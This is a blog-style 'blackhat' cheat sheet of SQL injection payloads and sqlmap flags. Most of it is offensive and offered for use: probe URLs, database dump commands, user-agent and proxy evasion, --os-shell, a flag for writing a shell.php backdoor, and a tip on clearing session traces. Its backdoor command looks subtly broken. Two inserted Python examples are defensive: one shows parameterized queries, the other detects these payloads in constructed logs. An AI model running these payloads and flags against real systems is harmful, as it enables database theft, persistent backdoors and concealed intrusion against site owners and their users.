Sleep
Jan 15, 2025

SQLMAP PAYLOADS — BLACKHAT STYLE CHEAT SHEET

This is a basic cheat sheet for beginners. I would go to the following if you want actual real payloads: https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/

For those deep in the game, use these SQL payloads to own your target like a hacker.

BASIC URL INJECTIONS
Start with these to probe the weak spots:
http://target.com/vuln.php?id=1' OR '1'='1
http://target.com/vuln.php?id=1 UNION SELECT NULL,NULL --

Test boolean-based injections:
http://target.com/vuln.php?id=1' AND '1'='1
http://target.com/vuln.php?id=1' AND '1'='2

Time-based delay tests:
http://target.com/vuln.php?id=1' OR IF(1=1, SLEEP(5), 0) --
http://target.com/vuln.php?id=1 AND BENCHMARK(1000000, MD5(1)) --

Error-based payloads:
http://target.com/vuln.php?id=1' AND UPDATEXML(1, CONCAT(0x3a, (SELECT @@version)), 1) --
http://target.com/vuln.php?id=1' AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT DATABASE()))) --
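To see why the boolean probes above give different responses, and what actually closes the hole, here is an added example (it is not from the original post and is not sqlmap code) using Python's sqlite3 with a constructed users table standing in for the database behind vuln.php. lookup_vulnerable splices the id value into the query the way a vulnerable page does; lookup_parameterized validates the type and binds it. The table name, rows and probe labels are all made up for the example.

```python
import sqlite3

# Constructed in-memory table standing in for the database behind vuln.php.
# Nothing here is real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, secret) VALUES (?, ?, ?)",
        [(1, "alice", "a-secret"), (2, "bob", "b-secret"), (3, "admin", "root-secret")],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    # The id value is spliced into the SQL text, so a quote in the input
    # closes the literal and whatever follows becomes part of the query.
    sql = f"SELECT id, username FROM users WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # Hardened form: validate the type, then bind the value. A bound
    # parameter travels as data and can never alter the query structure.
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ?", (uid,)
    ).fetchall()

# The probe strings from the cheat sheet, as they arrive in the id parameter.
PROBES = {
    "baseline": "1",
    "or-true": "1' OR '1'='1",
    "and-true": "1' AND '1'='1",
    "and-false": "1' AND '1'='2",
    "union-null": "' UNION SELECT null,null --",
}

def probe_report(lookup):
    # Row count per probe. On the vulnerable function or-true returns the
    # whole table and and-true/and-false differ, which is exactly the signal
    # boolean-based blind injection keys on. On the hardened function every
    # non-numeric probe yields nothing.
    conn = make_db()
    return {name: len(lookup(conn, payload)) for name, payload in PROBES.items()}

if __name__ == "__main__":
    print("vulnerable   :", probe_report(lookup_vulnerable))
    print("parameterized:", probe_report(lookup_parameterized))
```

Run it and compare the two dicts: the vulnerable lookup leaks the whole table on or-true and shows a 1-row vs 0-row difference between and-true and and-false, while the parameterized lookup returns rows only for the plain numeric id.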

POST DATA PAYLOADS
Hit the backend hard through POST forms:
--data="user=admin' -- &pass=test"
--data="user=admin' OR '1'='1 -- &pass=test"

Inject union selects into fields:
--data="search= UNION SELECT table_name FROM information_schema.tables -- "

DATABASE DUMPS
Draining their database like it's a leaky faucet.
Get all database names:
--dbs

Get all table names from a specific database:
-D target_db --tables

Get column names from a specific table:
-D target_db -T users --columns

Dump the selected columns from the table:
-D target_db -T users -C username,password --dump

Go nuclear on everything:
--dump-all

WAF BYPASS AND STEALTH MODE
Stay under the radar.
Randomize user agents to throw off their logs:
--random-agent

Proxy chains to mask your IP:
--proxy=http://127.0.0.1:8080

Force a specific database backend to narrow down your payloads:
--dbms=mysql
--dbms=oracle
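--random-agent only swaps the User-Agent string, so anyone watching the logs should key on what is in the query and how fast one IP hammers one parameter, not on the UA. The following is an added example, not from the original post and not part of sqlmap, that scans constructed Apache combined-format log lines for the payload shapes listed on this page (union selects, SLEEP/BENCHMARK/pg_sleep/WAITFOR, UPDATEXML/EXTRACTVALUE, quoted boolean tails, trailing comment terminators) and counts flagged requests per source IP. The log lines, IPs, timestamps and user-agent strings are all constructed; the pattern names are this example's own labels.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines; IPs, paths and user agents are
# made up for this example and are not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jan/2025:10:00:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2025:10:00:02 +0000] "GET /vuln.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.7 - - [15/Jan/2025:10:00:03 +0000] "GET /vuln.php?id=1%27%20AND%20%271%27%3D%272 HTTP/1.1" 200 128 "-" "Mozilla/5.0 (X11; Linux)"
203.0.113.7 - - [15/Jan/2025:10:00:04 +0000] "GET /vuln.php?id=1%20UNION%20SELECT%20NULL%2CNULL%20-- HTTP/1.1" 500 77 "-" "sqlmap/1.x"
203.0.113.7 - - [15/Jan/2025:10:00:10 +0000] "GET /vuln.php?id=1%27%20OR%20IF(1%3D1%2C%20SLEEP(5)%2C%200)%20-- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh)"
198.51.100.9 - - [15/Jan/2025:10:00:11 +0000] "GET /vuln.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Payload shapes from the cheat sheet, matched against the URL-decoded query.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-delay", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("quoted-boolean", re.compile(r"'\s*(or|and)\s*'[^']*'\s*=\s*'", re.I)),
    ("schema-enum", re.compile(r"information_schema", re.I)),
    ("comment-terminator", re.compile(r"(--|#|/\*)\s*$")),
]

def classify(url, ua):
    """Return the list of pattern tags a decoded request matches."""
    decoded = unquote_plus(url)
    tags = [name for name, rx in SQLI_PATTERNS if rx.search(decoded)]
    # The stock sqlmap UA is a cheap extra signal; --random-agent removes it,
    # which is why the query-content checks above come first.
    if "sqlmap" in ua.lower():
        tags.append("sqlmap-ua")
    return tags

def scan_log(text):
    """Parse combined-format lines and return one finding per flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["url"], m["ua"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "url": unquote_plus(m["url"]),
                             "status": int(m["status"]), "tags": tags})
    return findings

def suspicious_ips(findings, threshold=3):
    """Source IPs with at least `threshold` flagged requests. sqlmap fires many
    variants at one parameter, so volume per IP is the stronger signal."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["tags"], h["url"])
    print("suspicious:", suspicious_ips(hits))
```

Point scan_log at a real access log and the only line that changes is the input; the decode step matters because sqlmap sends its payloads percent-encoded, so raw-line grep for "UNION SELECT" misses them.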

SYSTEM LEVEL PWNAGE
Turn SQLi into full-on system takeover.
Get a shell on the target's OS:
--os-shell

Drop a backdoor for later access:
--file-write=/var/www/html/shell.php --file-dest=/var/www/html/shell.php

TIME-BASED PAYLOADS FOR THE PATIENT HACKER
Delay responses to confirm blind injections.
MySQL:
1' AND IF(1=1, SLEEP(10), 0) --

PostgreSQL:
1' AND 1=1; SELECT pg_sleep(10) --

Microsoft SQL Server:
1' WAITFOR DELAY '0:0:10' --

COMMON PAYLOAD STRINGS
Classic union injections:
' UNION SELECT 1,2,3,4 --
' UNION SELECT null,null,null --

Comments to end bad queries:
' OR '1'='1' --
' AND '1'='1' --

PRO TIPS FOR DESTRUCTION
Go loud, full level testing:
--level=5 --risk=3

Custom techniques to fit the job:
--technique=T
--technique=E

Flush session logs after testing to clean up:
--flush-session

Batch mode for no interruptions:
--batch
